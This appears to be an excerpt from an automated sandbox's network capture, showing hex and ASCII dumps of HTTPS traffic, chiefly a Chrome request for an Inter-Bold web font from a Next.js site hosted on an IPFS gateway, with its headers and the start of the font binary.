                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 75 08 a2 4d a9 80 8a d2 52 52 39 60 63 c5 82 75 b2 31 b6 c1 c6 36 60 1b 1d 52 62 10 22 25 56 23 ea 8b 51 84 09 bc 68 bf 55 ef fb a8 9f f2 bc fc d5 e3 c9 4d 32 6f be 16 a9 e0 05 da 50 5a db 36 ae 72 01 6b 9f f8 ef f7 52 da e7 de 17 e7 6f a2 cb 84 54 cb 24 02 25 e6 12 c0 42 4e 01 11 23 14 a9 09 33 42 91 8d 46 ab 21 29 b3 93 8e 98 47 d2 b6 db b0 ab 88 a4 15 f4 19 7e 7f d8 76 ad 5f 08 49 0c 79 e2 33 be 34 aa e4 4b 3e 00 bb 1d cf 1b eb d9 21 99 f3 cd 96 ac 8c 96 5d 91 31 46 76 ec ac fd 46 32 47 46 d6 0a 19 73 64 44 22 52 29 b9 9c ea 47 38 57 5c a8 e3 99 03 75 6c 65 54 4e d7 b0 f7 d7 4b a7 97 b2 70 18 29 2b c3 7d 38 66 48 15 98 fb 4d 88 64 77 d3 01 05 99 05 56 64 19 0f 08 3e 12 e0 b3 6c cf fb a7 35 6a cd 5e 13 c5 04 9c 21 44 8e ed 1c a8 72 02 fe 08 a1 fd 2a ff
                                                                                                                                                                                                                                                  Data Ascii: uMRR9`cu16`Rb"%V#QhUM2oPZ6rkRoT$%BN#3BF!)G~v_Iy34K>!]1FvF2GFsdD"R)G8W\uleTNKp)+}8fHMdwVd>l5j^!Dr*
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 70 b7 d9 9d 8f 2e ba 2c b8 f0 ae 6a 5a 7d ab e5 53 6c cb b3 d0 1a 94 0f ed 79 49 4b f4 3e 00 7c de 8f ff d9 2d 79 d5 2d 2d b4 24 87 af 7b b0 87 75 dc 92 e7 62 da f2 92 f1 3c 5a 1e 60 cd 02 52 09 66 4e 1a 6c 69 49 1a 94 ed 61 b2 97 80 0e 88 de 4f a6 df dd ef 73 bf e7 3d 9e f7 06 04 f8 7f 7e a9 49 df 59 ed ec fe 9f ee a0 85 1e 26 b1 15 0a 55 c6 29 38 30 30 84 cd fc b1 ad b9 92 db 6c ef 3f c8 b3 5d e9 72 4a ed b4 01 d6 0a 8a c3 02 83 68 08 0c 43 ad e1 10 14 c6 42 14 bf f6 69 bb dc 1f e3 32 72 e5 0a 17 b2 e2 dd f1 3b 5e 1d f0 80 32 0e 51 da fc bc 4e 73 cd cf 0f 1c 90 0f 61 2a 4e 1d a6 c4 e7 73 0a 04 cb 72 fa 3a e5 55 96 65 f7 62 3b e4 03 e2 29 5f f4 65 59 b6 c3 b8 75 ea 08 b8 75 99 bb 0d dd 3a ce 92 0e aa b2 2f 65 4f 85 ff 6a 99 e2 95 53 86 54 d8 d0 8c dc ac
                                                                                                                                                                                                                                                  Data Ascii: p.,jZ}SlyIK>|-y--${ub<Z`RfNliIaOs=~IY&U)800l?]rJhCBi2r;^2QNsa*Nsr:Ueb;)_eYuu:/eOjST
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 7e 0b 87 0e f0 84 d9 16 3b f6 9a b0 7c 36 62 00 cc 38 a0 f3 12 e9 4d 8c 07 1d b8 0a e4 40 c6 66 f4 85 07 98 b1 df 98 e2 33 f3 32 6c 2d 5d 68 eb 7d 76 e0 87 93 30 8b c0 9f d9 fb 87 00 01 58 c0 17 58 ab 6f 89 15 c8 04 fe c2 14 40 85 1a 00 6d 81 b3 fc ea 8a 03 ed 90 85 c0 91 8b 59 89 db 01 b2 03 1c bf 7d 58 d0 e7 0f a4 40 f1 a2 50 17 a0 f6 0e e4 83 4e 52 01 1d 98 82 6d 00 c5 70 81 ef ae 44 fd c0 fe 44 12 e0 41 0e 3a c0 82 1e b0 40 04 40 0e ae 00 85 02 bc 02 17 6f f0 09 a6 3a 57 f2 98 0b 6e 57 5a de e5 ef 7c cc b7 b4 b6 6b 23 72 b5 fb 7b 30 9c 9e 1b 46 19 98 3a 53 a7 74 a3 01 23 68 8a de 0b b3 c4 f4 80 c8 99 97 e4 2f e4 3c 2b c0 e4 02 6b a8 8a 25 1b a0 c4 8a 7d d0 e3 fc 32 7c 95 eb a6 de 2d b4 65 7c 31 74 a7 9d ca ef de 73 36 7f fa 08 f2 b7 4f c8 3f 00 30 d3
                                                                                                                                                                                                                                                  Data Ascii: ~;|6b8M@f32l-]h}v0XXo@mY}X@PNRmpDDA:@@o:WnWZ|k#r{0F:St#h/<+k%}2|-e|1ts6O?0
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 8a ae ca 8a 85 6e 68 01 3b ba a9 c5 5c 45 b7 b4 9c f3 74 7b ea e9 ce a8 0c 6b 7b 1a 0a aa e2 d0 4b 8d 7e a6 63 34 9e 0a 7f 1c bf 93 dd 4b d0 e9 1e b6 92 69 cf da ec 6c 0d 6d 75 be 37 fd d7 88 de d7 d0 a8 3e d6 d4 e8 fe 29 69 8c 18 21 1e 2b 41 02 9e 40 28 cd 78 22 19 79 51 4a da d2 18 90 65 0b e1 29 4f 38 5f 05 22 05 6a 2c 46 b8 26 20 a2 35 95 20 ad 66 a0 a0 a5 48 92 14 01 02 32 22 34 74 64 18 98 28 70 f0 51 11 10 a3 23 a3 c6 c4 c3 8b 43 48 18 97 92 2a 9e 0c ba 04 b2 65 97 2a 5f 61 32 c5 e2 f3 53 26 31 7f d5 60 05 a8 83 2c 48 b7 ca 62 0c 20 97 a8 09 a5 1c ed 18 e5 61 62 56 82 87 17 c2 92 a5 90 56 ad 86 f2 ce fb 4a 7d 59 c7 56 ee c8 c8 ce cd 78 a6 2e ed f4 2c 5d de 99 f9 ba 32 9b 65 37 33 cf e1 7b ba 3b 23 f7 6c 7f 8e d5 f3 fd 37 7e 2f 56 37 7c cb 63 ac b7
                                                                                                                                                                                                                                                  Data Ascii: nh;\Et{k{K~c4Kilmu7>)i!+A@(x"yQJe)O8_"j,F& 5 fH2"4td(pQ#CH*e*_a2S&1`,Hb abVVJ}YVx.,]2e73{;#l7~/V7|c
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: d1 43 64 88 ca 9d 08 fd f1 fb f4 70 2e f4 a7 45 33 4a fa 16 3f d0 a4 b0 27 b7 2e d2 ca ed 00 00 00 00 00 00 00 00 ee 17 00 00 10 c5 77 0c d4 e9 bf 77 09 b7 dc 05 9e e4 bd e1 89 61 6a 8e b2 af a1 d4 59 44 94 c4 dc 5f 50 05 cc cc cc 4c 44 53 85 8b 8b cb cc 53 cd 2f 2b ff ac d0 7b 5c e4 bd 2a ea f1 a4 9d cf 6a b0 dc c7 1d 9d 81 71 c6 e9 3f 17 15 9b 82 c7 2e 25 8e 94 70 17 34 75 cb 4b 60 ad fd ea 3c 9e e2 cb b2 15 e8 6e 78 be bd ca 06 1a b3 59 17 e5 b9 75 d8 38 44 70 ed a1 ec 3f 87 f1 c9 e2 55 6b 25 89 c5 66 d9 bd ea 78 5f 51 a3 a9 93 70 d5 51 d0 a0 e4 25 22 85 40 11 25 53 ee 88 ab 42 5c e3 2e 7f f0 3f f7 79 c0 13 12 c1 69 92 b7 8a 72 4c 55 12 86 0b 4d 69 42 30 99 6c 98 1d 87 8a 4e 7b 5e 9e bd 42 e7 82 26 2a 97 ef d0 a5 5a a0 4a 29 2e bf 77 1a 91 6a fa 4e 21
                                                                                                                                                                                                                                                  Data Ascii: Cdp.E3J?'.wwajYD_PLDSS/+{\*jq?.%p4uK`<nxYu8Dp?Uk%fx_QpQ%"@%SB\.?yirLUMiB0lN{^B&*ZJ).wjN!
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 93 2b 94 2a f5 3b a4 ee 6e 6a 00 00 00 00 00 00 00 00 00 00 00 00 0c 88 11 27 41 92 14 69 0f 3c f4 c8 63 7e fc 05 08 14 24 58 88 30 e1 22 44 8a 12 0d 25 46 ac 38 f1 12 24 26 af f2 98 2c 39 f2 14 28 ca f6 5c 8e 5c 79 f2 15 78 a1 44 a9 32 e5 2a 54 aa 52 7d dd 71 77 10 00 00 00 00 00 00 00 00 2e 49 4d 86 9e cc 38 99 f3 3d 3e b9 ce bf 1a 5c 78 f0 21 90 a0 44 8d 06 1d 7a 8c 6e 60 c1 1a de 5a 22 a4 c8 68 1e 12 2f 00 00 00 00 00 40 13 af 28 39 d1 41 93 df 2d 37 7a c4 2a df d6 7d 2f 0b 38 02 89 42 03 92 a4 48 93 b1 5f e8 b7 58 1a ae ac eb 17 21 23 ee 1b 4f 85 aa 1d ca 43 03 01 00 00 00 b8 1d 00 00 10 73 d4 51 9e 2f 8f d1 11 6d 5d ce b7 f7 f8 f3 7e dd 81 18 ef de e6 d1 7b 7f 2a 5f 52 e8 24 ea 65 1f cc 2f 5f fc f4 2b cc 64 31 9b 22 08 2c 48 33 2c c7 0b a2 24 2b 94
                                                                                                                                                                                                                                                  Data Ascii: +*;nj'Ai<c~$X0"D%F8$&,9(\\yxD2*TR}qw.IM8=>\x!Dzn`Z"h/@(9A-7z*}/8BH_X!#OCsQ/m]~{*_R$e/_+d1",H3,$+
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 51 ae 42 a5 2a d5 6a d4 c2 aa 83 53 af 01 1e 01 11 09 59 a3 26 94 52 49 73 0b ab 09 3e 5c 11 fd 77 56 04 61 4e 2d e6 cf 65 e5 16 65 2a 0c 60 d7 0f 49 29 73 00 71 68 24 be 30 ce 5f 0d f6 cd 8e 5d df fd b0 e7 a7 fd 1c 54 01 00 49 01 91 26 43 6c 45 43 c4 28 30 4b 38 5e 29 a8 44 49 56 6b b4 3a 07 a3 c9 c3 97 6f 4f 2f 6f 1f 0d 33 54 58 c2 37 07 fc 1f d6 3e d3 3e 76 84 cb 1d 20 1b 8d e8 1f fe ed 8f aa cf 37 b2 10 00 06 80 a4 48 b0 03 f6 14 0d 11 a3 c0 2c e1 78 a5 a0 12 25 59 ad d1 ea 1c 8c 26 0f 5f be 3d bd bc 79 aa f3 2e b8 c8 92 72 56 29 a8 2c d1 0a 88 e7 f6 e2 f8 f0 f6 c4 c6 25 7a 59 e8 62 80 46 4c bb a9 0f 60 18 86 61 18 86 61 18 e6 47 46 eb c0 fd 9b f3 0c c3 80 95 d1 3e 15 75 70 34 10 fa 15 0c c3 03 9a c8 b4 70 a9 0e a7 51 1e a3 38 54 ea 31 87 6f cb 08 25
                                                                                                                                                                                                                                                  Data Ascii: QB*jSY&RIs>\wVaN-ee*`I)sqh$0_]TI&ClEC(0K8^)DIVk:oO/o3TX7>>v 7H,x%Y&_=y.rV),%zYbFL`aaGF>up4pQ8T1o%
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: c8 90 0d 4f 5f 37 74 54 3a b1 50 40 58 54 2d 5a b5 69 d7 81 86 ae 53 17 86 6e 4c 3d 7a f5 61 61 e3 18 aa 38 25 ee fb db f3 66 df 4f 1a 56 cf c8 5c 96 d4 80 2d 6f c7 7a 1e ef e5 66 07 78 cc 81 3e 0d 4f 08 73 5f 68 71 56 c8 03 62 ad 20 66 b5 c8 50 ae e6 1f 96 2d 1e e2 e2 e7 44 9e 9b 17 38 20 09 aa d9 46 24 6e c4 bd 58 0c 97 9f b4 20 68 8d e5 65 1d ea 56 1a 1c 9a 58 61 02 59 1b 95 6f 36 b5 37 0c 74 75 c6 24 44 51 73 e1 0c ae a6 04 41 81 fc 0f 3e c3 41 5c c6 47 12 32 f1 b8 6c ae 18 a3 e6 c6 3c d6 27 3e cf f9 72 24 5d bb 98 3d 93 b9 15 f3 de 45 9a 5c e8 ec 3d 0e 0a e1 5f 56 ff da 99 ab a7 2d 9b c1 df 66 f4 b5 0d ac b7 90 dd 62 bd dd 7a 1a 98 bc 3e 3b 1b bf b4 06 d6 8c 5f 5e 07 6a 80 d8 7a 2c 03 47 4f 82 54 35 1f 14 4a 95 5a a3 d5 e9 0d 46 93 19 00 21 18 41 31
                                                                                                                                                                                                                                                  Data Ascii: O_7tT:P@XT-ZiSnL=zaa8%fOV\-ozfx>Os_hqVb fP-D8 F$nX heVXaYo67tu$DQsA>A\G2l<'>r$]=E\=_V-fbz>;_^jz,GOT5JZF!A1


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.549720209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC863OUTGET /_next/static/media/Inter-Bold.579e0f95.woff2 HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.css
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:39 GMT
                                                                                                                                                                                                                                                  Content-Type: font/woff2
                                                                                                                                                                                                                                                  Content-Length: 106140
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigggfmlvpfxsarah3lti5wm7ea5wnecl2ssjvfdnjjllzpzpynl64"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/media/Inter-Bold.579e0f95.woff2
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeifof6k75qeadmbrmujchwmdll7rtygnwlov6xsnie6lclbmeab4zq,bafkreigggfmlvpfxsarah3lti5wm7ea5wnecl2ssjvfdnjjllzpzpynl64
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73292
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 36 34 61 62 62 34 32 35 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8ca0e4064abb4251-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1326INData Raw: 77 4f 46 32 00 01 00 00 00 01 9e 9c 00 0d 00 00 00 04 be 20 00 01 9e 3e 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 88 0c 1b 84 dc 28 1c 81 aa 4a 06 60 00 81 cb 0a 0a 88 a9 2c 86 e4 51 0b cf 54 00 01 36 02 24 03 cf 4e 04 20 05 8c 5a 07 81 c9 2d 5b 07 33 b4 d2 ff 1f fb 79 2f bc 25 fa f0 0c 06 78 b6 69 59 6b 66 3f cb 7d 74 0e a9 c4 d1 5a 00 9d d3 fb ed cb 64 11 99 c4 b6 17 f2 4d 7d 41 8b 8e ea 18 c3 0b 1b 0e 25 6f 56 bf 6e 28 6e 98 4e d1 0b d7 6d 08 64 b6 c8 da bc 3e 8b ec ff ff ff ff ff ff ff ff ff ff ff ff 6f 6b 59 44 3a 9d dd ff f7 5e fb 52 a5 57 e9 48 a8 81 44 93 00 63 19 6c e3 4a 08 89 63 c7 4e 20 4a 33 86 68 ab e0 42 ff 23 e1 63 36 41 8a 30 51 59 9c 4a 2a 44 49 5e 70 b1 62 4b 61 2a 28 c5 34 88 c0 35 11 12 4d 6b 12 b3 b5
                                                                                                                                                                                                                                                  Data Ascii: wOF2 >(J`,QT6$N Z-[3y/%xiYkf?}tZdM}A%oVn(nNmd>okYD:^RWHDclJcN J3hB#c6A0QYJ*DI^pbKa*(45Mk
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 36 36 8b 50 06 c8 6e f7 bf ed 19 92 44 4a 32 c6 4a 76 a5 8d 54 1a 34 96 ac f9 66 ec ff f7 de 58 8f c7 5b 8f 7f de 98 eb 49 34 24 32 f6 01 d8 ed de 58 2b 73 65 85 86 19 85 8c d5 30 33 56 46 c8 28 f6 bf 95 95 b9 df e3 cd b7 76 c8 ca 58 09 21 23 a3 a8 8c 48 13 fc ff ff 7e bf 5f 88 e9 39 09 f1 26 e2 91 04 37 12 5f 44 2c 91 89 d0 4c 92 8e ae f2 bd d4 3f 5e 28 ec 09 53 44 14 44 f7 f8 6c dc 02 6c 8c 61 1e 67 10 e2 18 16 b8 36 c9 18 3b 45 64 d9 ce 3a 60 65 e1 85 fb 03 98 5b 07 2d 15 3d 22 c7 36 46 f4 36 c6 e8 d1 83 1e 95 a3 4a 68 89 92 28 11 69 31 01 41 44 b4 09 b1 b1 00 15 1b ec 7f 8f 39 fb e7 bf 58 16 18 18 a2 24 51 14 e3 09 e9 be 98 7f d3 f6 9f 68 b4 08 63 8f ea 01 a2 9c 7f 91 7c 00 f0 50 ed f7 ff ef ea ee e9 9e 3d 67 ff f3 5f 3c 83 d0 8c 42 91 04 96 31 26 e5
                                                                                                                                                                                                                                                  Data Ascii: 66PnDJ2JvT4fX[I4$2X+se03VF(vX!#H~_9&7_D,L?^(SDDllag6;Ed:`e[-="6F6Jh(i1AD9X$Qhc|P=g_<B1&
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 1b 7c 5f 46 c8 78 79 c1 0b 94 e0 12 56 b5 65 0f 24 2b 11 8c ce 54 45 e8 ba 0a db f9 f7 55 f5 d7 7b 49 d1 b9 8f a6 7c 00 51 c7 06 95 06 a6 02 4a a3 92 0c 93 ed 54 39 bd 4c 19 e6 7b ef 03 88 77 01 92 7a ef 01 54 80 07 52 06 41 15 b0 d8 7e 00 55 00 d0 91 59 55 da 91 48 95 9e 52 db 03 54 02 58 8e 03 42 3c 0e 49 95 50 a4 e4 d2 45 85 29 9d 4e eb 14 d3 7f ab 65 58 fe f9 63 a6 e9 97 d6 e7 f9 8f 7f 18 ff 58 eb dc ca ff a9 da bf 2d 20 6d 90 f4 93 f4 1d 52 2e 3a ed 4f b5 dd b9 4d 4d 81 b9 17 c3 c1 cc 00 0c 33 24 45 02 54 22 a9 44 69 77 b9 d4 ee 3e 89 da 00 80 d4 1a a4 b8 df 92 5e d2 cf d2 0f 31 50 2f ef 7b 0e 29 15 65 8c a5 2b bb f7 e9 dd b5 ee fa 90 aa da 45 d3 d9 ff ff b5 4a db 77 6f fe 50 f0 a5 03 95 70 bb 00 cd 89 30 9d 0a a1 8d 72 05 bd 3b f5 fb 0d ff 40 d5 d4
                                                                                                                                                                                                                                                  Data Ascii: |_FxyVe$+TEU{I|QJT9L{wzTRA~UYUHRTXB<IPE)NeXcX- mR.:OMM3$ET"Diw>^1P/{)e+EJwoPp0r;@
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: a1 d9 3d 7d ed 5d a5 64 88 0f 52 0c e2 c3 94 11 e2 eb 94 0c f1 7d 4a 86 f8 b1 ae fa af b3 a9 fe df 98 82 fb b4 d3 08 84 84 05 08 41 32 07 08 42 b2 06 08 42 f2 04 06 c9 17 18 24 7f dd 10 3c 21 e2 27 41 f2 24 c9 9c 6c bf 72 f2 a2 78 8a d4 4e 8d c1 11 98 1c b9 59 2a 10 d2 fa 1e 04 79 ef 64 6f 7b 48 8d fe e8 54 e5 e9 e9 fb 8b b3 44 7b 17 81 90 5f 82 20 bd 02 21 bf 56 f1 bf 70 41 87 14 7f 25 3d f7 2a a4 e8 6a 54 5f 5b a3 28 10 92 16 08 d9 14 04 d9 12 08 d9 5e 65 f0 86 da 22 81 90 54 7f 5b 39 bb ee ce 15 03 43 db 53 2c 3a 86 f3 a9 b8 e8 b4 75 3e 8f bb ce df ef bf f0 d7 8b 97 e8 f5 c3 f4 8d 47 dd d8 76 cd fd c8 f5 ab bf 77 13 f2 e9 cd 2f ff e6 e8 c5 30 fc 70 eb 7e bb cd f2 e7 6d d7 fe 8f 98 0a 04 e8 88 a9 b8 fb a7 4f 6e aa e8 55 df 2c ae 8a 21 13 40 3a a4 db c7
                                                                                                                                                                                                                                                  Data Ascii: =}]dR}JA2BB$<!'A$lrxNY*ydo{HTD{_ !VpA%=*jT_[(^e"T[9CS,:u>Gvw/0p~mOnU,!@:
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 2e 97 87 1f 39 fc e9 54 d2 7b 7b 58 8f 3b 41 1f 32 91 a4 22 e7 e4 17 ba 73 f0 4d c4 f7 e4 17 fe 8d e5 34 c2 3f a1 81 4a 7a 7b 90 01 0c e1 1d bf 97 97 f3 9f a1 4a a9 c0 78 0e a3 33 a0 8f 99 3a 61 96 c3 9e 72 d4 51 1b 1c f7 89 8d 3e f3 ad dd 4e 3a ed b0 1f fc e0 58 30 80 7c 1c 8f b4 b4 0b 42 f2 92 9f 80 47 a6 3c 83 c1 8f 52 9d e1 60 d7 6c 4e 66 70 48 62 f3 72 76 e6 78 1a e6 87 b9 cf b1 f9 37 73 39 3f 4f 8d 34 46 30 3e 0a 88 fe 8e 74 3b f2 be c9 3c e7 9e f7 21 77 b3 fa dc 78 f4 15 87 4b ab 33 8d 65 d9 9d e6 7a d8 97 d1 f3 8c 67 e5 1f 20 b9 51 a8 d2 72 bb 30 e5 e4 4e 11 2a 2c 77 9b a1 a2 32 03 07 e1 0e 20 c9 ae 7b bd d4 da 54 61 a8 3d 81 66 04 ab fa d0 2c 09 0b 16 5c b2 62 95 8c 75 bf c9 d9 b0 e1 9a 4d ff 28 d8 b6 4d d1 8e 1d 4a 8e 1d 53 0e 48 8b ba 30 8c 3a
                                                                                                                                                                                                                                                  Data Ascii: .9T{{X;A2"sM4?Jz{Jx3:arQ>N:X0|BG<R`lNfpHbrvx7s9?O4F0>t;<!wxK3ezg Qr0N*,w2 {Ta=f,\buM(MJSH0:
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 5c 15 7d f2 58 11 78 35 87 17 f2 ad 17 9f 17 3f e1 16 c6 84 35 8c d6 56 96 db f4 6d 24 75 9b 41 c1 a5 10 f4 09 15 26 5c 04 94 48 51 a2 c5 88 15 e7 9b 78 09 12 25 49 96 a2 2b 9a 2d 47 ae 3c f9 0a 14 2a 52 ac 44 a9 32 e8 4b 2c ed 8d 4c 57 a8 54 75 49 46 f7 bb 3d 60 d0 90 61 23 46 8d 19 37 61 92 67 53 7d a8 8c 06 46 6d ec ba 70 93 19 79 b7 95 a0 d1 45 de b9 2b 02 7f 02 08 24 28 d0 4b b1 a7 9b 33 a6 d8 8b 04 ca eb 51 eb ba 70 9c 76 9b 4c 11 90 75 3f ca 1b a2 67 9e b8 97 a8 3f 50 fe 90 d9 70 4b 42 e9 36 01 ae 0e fc ed b2 12 ed 66 8b 92 53 45 11 69 f6 cb d4 cd 29 8f 13 22 11 e4 38 c9 86 ec 15 d3 cb 63 01 00 00 00 00 00 00 00 3c 55 00 00 40 8c d2 c9 a0 61 f9 8b 2b f2 44 0c b8 db 15 52 e9 23 af 18 ab d9 91 97 75 38 58 e3 40 10 ec 20 0c af 31 54 01 0c c3 30 0c c3
                                                                                                                                                                                                                                                  Data Ascii: \}Xx5?5Vm$uA&\HQx%I+-G<*RD2K,LWTuIF=`a#F7agS}FmpyE+$(K3QpvLu?g?PpKB6fSEi)"8c<U@a+DR#u8X@ 1T0
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 1b 7c 04 d4 d4 36 7a ba 26 63 c8 90 71 d4 29 d8 ae 94 1c 60 71 51 a0 c3 25 40 c0 87 cd 7a 38 88 3c 67 d2 de 82 28 13 14 c3 01 41 42 8a 66 58 8e 37 08 a2 24 2b 46 d5 64 d6 2c 56 dd 66 77 38 5d 6e 5e b1 77 70 74 02 81 21 50 18 1c 81 44 a1 31 58 1c 9e 00 10 49 64 0a 95 56 ba c3 19 83 c9 62 73 b8 3c 95 5a a3 d5 e9 0d 46 93 d9 62 b5 21 80 60 04 c5 70 82 04 14 cd b0 1c 2f 88 92 ac 68 75 f5 f4 0d b0 d3 60 b2 d8 1c 2e 4f 20 96 48 65 72 00 84 60 04 c5 70 82 a4 68 85 52 a5 d6 68 75 7a 83 d1 64 b6 58 6d 76 87 d3 e5 fe 7b ac ee 43 01 00 00 00 00 00 00 00 00 00 00 00 80 15 a1 55 54 4d 37 4c cb 76 5c 6c 80 71 14 52 19 8b 14 00 04 81 21 50 18 1c 81 44 85 94 3d ec 51 8f 79 dc 13 9e 34 31 25 10 49 64 0a 83 c9 62 73 b8 3c be e0 e5 cf d8 35 a3 83 00 00 00 00 00 00 00 00 f0
                                                                                                                                                                                                                                                  Data Ascii: |6z&cq)`qQ%@z8<g(ABfX7$+Fd,Vfw8]n^wpt!PD1XIdVbs<ZFb!`p/hu`.O Her`phRhuzdXmv{CUTM7Lv\lqR!PD=Qy41%Idbs<5
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 4a 2a a7 10 0f 29 29 29 29 69 7f 4a 82 32 d4 55 32 67 50 6f 0e f5 d6 0d d0 79 83 5e 07 45 ef c7 fa 5e 29 b0 71 06 24 d9 cf 05 61 3b f1 42 d6 06 35 45 c8 ed 57 8a df d0 f0 c4 72 57 10 a4 5b 92 f0 3d b3 5f 85 68 79 4a 89 96 f3 90 5d 1e a5 db e3 f5 f9 09 05 c6 51 48 a5 af 73 fb 6b 03 dc 14 36 85 7f 86 84 c0 ef 1f 4c 26 d3 7c d1 82 63 93 c7 31 97 c7 17 08 45 62 89 54 26 57 7c 50 08 d0 23 60 d5 fb de d4 3d da a8 36 83 c5 e6 70 79 7c 81 50 24 96 48 65 72 85 52 a5 d6 68 75 65 5a df a7 b4 ec ac c2 ad d9 7f 4f c5 24 cc 27 36 e7 6f e8 f2 1d f3 34 5b 6d 86 1f 0b 6d e8 8e f5 70 b6 a3 59 be 6b ae 3d fb 0e 1c 3a 72 ec c4 69 9c 25 01 20 60 10 50 30 70 19 63 38 20 48 48 d1 0c cb f1 06 41 94 64 c5 a8 6a 16 ab 0f 9f be 7c fb 31 50 3a 74 e9 d1 0f 83 f7 ce 8c dc 3f f9 f4 03
                                                                                                                                                                                                                                                  Data Ascii: J*))))iJ2U2gPoy^E^)q$a;B5EWrW[=_hyJ]QHsk6L&|c1EbT&W|P#`=6py|P$HerRhueZO$'6o4[mmpYk=:ri% `P0pc8 HHAdj|1P:t?
